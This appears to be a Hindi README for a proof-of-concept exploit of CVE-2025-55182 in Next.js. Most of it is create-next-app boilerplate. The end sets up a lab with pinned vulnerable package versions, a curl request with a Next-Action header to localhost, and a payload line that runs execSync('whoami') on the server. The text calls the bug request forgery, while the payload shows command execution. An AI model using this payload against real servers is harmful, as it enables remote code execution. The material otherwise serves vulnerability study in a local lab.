
CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Next.js सर्वर-साइड अनुरोध जालसाजी को लक्षित करता है, क्राफ्टेड मल्टीपार्ट अनुरोधों और Next-Action हेडर हेरफेर के माध्यम से।
यह एक Next.js प्रोजेक्ट है जिसे create-next-app के साथ बूटस्ट्रैप किया गया है।
पहले, डेवलपमेंट सर्वर चलाएँ:
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
परिणाम देखने के लिए अपने ब्राउज़र में http://localhost:3000 खोलें।
आप app/page.tsx को संशोधित करके पेज को संपादित करना शुरू कर सकते हैं। जैसे ही आप फ़ाइल संपादित करते हैं, पेज स्वचालित रूप से अपडेट होता है।
यह प्रोजेक्ट Vercel के लिए एक नए फ़ॉन्ट परिवार Geist को स्वचालित रूप से ऑप्टिमाइज़ और लोड करने के लिए next/font का उपयोग करता है।
Next.js के बारे में अधिक जानने के लिए, निम्नलिखित संसाधनों पर एक नज़र डालें:
आप Next.js GitHub रिपॉजिटरी देख सकते हैं - आपकी प्रतिक्रिया और योगदान का स्वागत है!
अपने Next.js ऐप को डिप्लॉय करने का सबसे आसान तरीका है Vercel Platform का उपयोग करना, जो Next.js के निर्माताओं द्वारा बनाया गया है।
अधिक जानकारी के लिए हमारा Next.js डिप्लॉयमेंट दस्तावेज़ीकरण देखें।
npx create-next-app@latest react-vuln-lab
npm install [email protected] [email protected] [email protected] --legacy-peer-deps
curl -v http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=boundary" \
-H "Next-Action: <YOUR_ACTION_ID_HERE>" \
--data-binary @payload.txt
- "_prefix": "require('child_process').execSync('whoami').toString()"